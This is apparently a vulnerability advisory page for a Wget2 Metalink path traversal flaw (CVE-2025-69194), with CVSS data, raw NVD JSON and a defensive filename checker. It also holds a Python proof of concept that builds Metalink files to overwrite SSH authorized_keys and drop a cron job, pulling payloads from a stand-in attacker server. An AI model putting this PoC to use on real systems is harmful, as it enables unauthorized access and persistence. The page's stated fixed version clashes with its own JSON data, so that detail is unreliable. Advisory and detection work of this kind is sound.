Security Vulnerability Report
CVE-2025-69194 CVSS 8.8 HIGH

CVE-2025-69194

Published: 2026-01-09 08:15:58
Last Modified: 2026-03-05 20:09:43

Description

A security issue was discovered in GNU Wget2 when handling Metalink documents. The application fails to properly validate file paths provided in Metalink <file name> elements. An attacker can abuse this behavior to write files to unintended locations on the system. This can lead to data loss or potentially allow further compromise of the user’s environment.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gnu:wget2:*:*:*:*:*:*:*:* - VULNERABLE
GNU Wget2 < 2.9.0 (presumed fixed version)
GNU Wget2 all versions (while the vulnerability existed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-69194 PoC - GNU Wget2 Metalink Path Traversal
Generate malicious Metalink XML file to exploit path traversal vulnerability
"""
import sys


def generate_malicious_metalink():
    """
    Generate malicious Metalink XML with path traversal payload
    This PoC demonstrates how attacker can write files to arbitrary locations
    """
    metalink_xml = '''<?xml version="1.0" encoding="utf-8"?>
<metalink version="3.0" xmlns="http://www.metalinkpublisher.org/spec/v3/">
  <files>
    <file name="../../../.ssh/authorized_keys">
      <verification>
        <hash type="sha256">a]b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4</hash>
      </verification>
      <resources>
        <url type="http" preference="100">http://attacker-controlled-server/malicious_key.pub</url>
      </resources>
    </file>
  </files>
</metalink>'''
    return metalink_xml


def generate_cronjob_exploit():
    """
    Generate Metalink file that writes to /etc/cron.d for privilege escalation
    """
    cron_metalink = '''<?xml version="1.0" encoding="utf-8"?>
<metalink version="3.0" xmlns="http://www.metalinkpublisher.org/spec/v3/">
  <files>
    <file name="../../../etc/cron.d/malicious_cron">
      <verification>
        <hash type="sha256">a]b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4</hash>
      </verification>
      <resources>
        <url type="http" preference="100">http://attacker-controlled-server/cron_payload</url>
      </resources>
    </file>
  </files>
</metalink>'''
    return cron_metalink


if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "--cron":
        print(generate_cronjob_exploit())
    else:
        print(generate_malicious_metalink())

# Usage:
# 1. Generate malicious Metalink: python3 cve_2025_69194_poc.py > malicious.metalink
# 2. Host malicious content on attacker server
# 3. Serve Metalink to victim: wget2 --metalink=malicious.metalink http://attacker.com/malicious.metalink
# 4. Or perform MITM to inject malicious file entry into legitimate Metalink response
```
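A defender-side check for the flaw described above, as an added example (not wget2's code and not its actual fix): it parses a Metalink document, reports every <file name> value that is absolute or contains a `..` component, and confirms that an accepted name stays under the download directory. The sample document is constructed, reusing the two traversal names from the PoC on this page; the function names and the `/home/user/dl` directory are hypothetical.

```python
import posixpath
import xml.etree.ElementTree as ET

# Constructed sample; the two "../" names are the ones used in this page's PoC.
SAMPLE = """<metalink version="3.0" xmlns="http://www.metalinkpublisher.org/spec/v3/">
<files>
  <file name="release/tool-1.0.tar.gz"/>
  <file name="../../../.ssh/authorized_keys"/>
  <file name="../../../etc/cron.d/malicious_cron"/>
  <file name="/tmp/abs"/>
</files>
</metalink>"""

def unsafe_reason(name):
    """Return why a Metalink file name is unsafe, or None for a plain relative path."""
    if not name or "\x00" in name:
        return "empty or NUL"
    norm = name.replace("\\", "/")
    if norm.startswith("/") or norm[1:2] == ":":
        return "absolute path"
    # Conservative: reject any '..' component, even one that would stay inside.
    if ".." in norm.split("/"):
        return "parent-directory component"
    return None

def audit_metalink(xml_text):
    """Return [(name, reason)] for every <file> element with an unsafe name."""
    # For untrusted input, parse with a hardened XML parser; the stdlib parser
    # is used here only so the example has no dependencies.
    findings = []
    for el in ET.fromstring(xml_text).iter():
        # Compare the local name so any Metalink namespace is covered.
        if el.tag.rsplit("}", 1)[-1] == "file":
            reason = unsafe_reason(el.get("name", ""))
            if reason:
                findings.append((el.get("name", ""), reason))
    return findings

def contained_path(download_dir, name):
    """Join name under download_dir; return None if the result escapes it."""
    root = posixpath.normpath(download_dir)
    target = posixpath.normpath(posixpath.join(root, name))
    return target if target.startswith(root + "/") else None

if __name__ == "__main__":
    for name, reason in audit_metalink(SAMPLE):
        print(f"REJECT {name!r}: {reason}")
```

Running the audit on Metalink files before they are handed to a downloader, and applying the containment check at the point where the output path is built, covers both the document and the write.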

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69194", "sourceIdentifier": "[email protected]", "published": "2026-01-09T08:15:57.980", "lastModified": "2026-03-05T20:09:43.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security issue was discovered in GNU Wget2 when handling Metalink documents. The application fails to properly validate file paths provided in Metalink <file name> elements. An attacker can abuse this behavior to write files to unintended locations on the system. This can lead to data loss or potentially allow further compromise of the user’s environment."}, {"lang": "es", "value": "Se descubrió un problema de seguridad en GNU Wget2 al manejar documentos Metalink. La aplicación no valida correctamente las rutas de archivo proporcionadas en los elementos de Metalink. Un atacante puede abusar de este comportamiento para escribir archivos en ubicaciones no deseadas en el sistema. Esto puede llevar a la pérdida de datos o potencialmente permitir un compromiso adicional del entorno del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, 
"impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:wget2:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.1", "matchCriteriaId": "01F2DB8C-7F7B-4F0C-8335-ADAFB74DB621"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-69194", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2425773", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}